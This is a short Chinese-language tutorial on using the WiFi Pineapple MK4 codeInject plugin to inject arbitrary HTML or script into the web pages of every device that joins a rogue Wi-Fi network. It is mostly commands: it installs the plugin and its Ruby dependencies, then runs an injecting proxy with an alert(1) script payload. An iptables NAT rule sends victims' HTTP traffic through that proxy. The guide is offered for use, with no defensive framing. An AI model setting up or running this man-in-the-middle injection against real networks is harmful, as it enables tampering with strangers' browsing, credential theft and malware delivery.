wifipineapple插件（codeInject的使用） _插件

不飞则已，一飞冲天；不鸣则已，一鸣惊人。这篇文章主要讲述wifipineapple插件：codeInject的使用相关的知识，希望能为你提供帮助。
如果在中间人攻击的时候，能在用户的网页中插入任意代码，可以说已经完成一半了
wifipineapple有个codeInject插件，可以让连上这个网络所有设备浏览网页的时候，在网页中插入任意html代码
但是目前我用的wifipineapple版本是MK4，官方很久不维护这个版本的wifipineapple
使用scp把本地的codeinject传到wifipineapple的 /pineapple/components/infusions/目录下

scp -r codeinject root@172.16.42.1:/pineapple/components/infusions

然后把opkg的源改成：

http://downloads.openwrt.org/attitude_adjustment/12.09/ar71xx/generic/packages/

执行

opkg update opkg install ruby-cgi opkg install ruby-core opkg install ruby-enc opkg install ruby-gems

cd进入 /pineapple/components/infusions/codeinject 目录，修正ruby执行socket， getAddrInfo的错误：

cp includes/install/socket.so /usr/lib/ruby/1.9/mips-linux ln -s /usb/usr/lib/ruby /usr/lib/ruby

cd进入 /pineapple/components/infusions/codeinject/includes/proxy 目录，执行命令：

export LD_LIBRARY_PATH=$LD_LIBRARY_PATH:/usb/lib:/usb/usr/lib export PATH=$PATH:/usb/usr/bin:/usb/usr/sbinruby -Kn proxy.rb --verbose --script-inject "< script> alert(1)< /script> "

添加本地数据转发：

iptables -t nat -A PREROUTING-i br-lan -p tcp --destination-port 80 -j REDIRECT --to-ports 8888

此时连接上该wifi所有用户，浏览网页的时候，会弹出弹窗：1
EOF
p.p1 { margin: 0; font: 11px Menlo } span.s1 { font-variant-ligatures: no-common-ligatures }【wifipineapple插件（codeInject的使用）】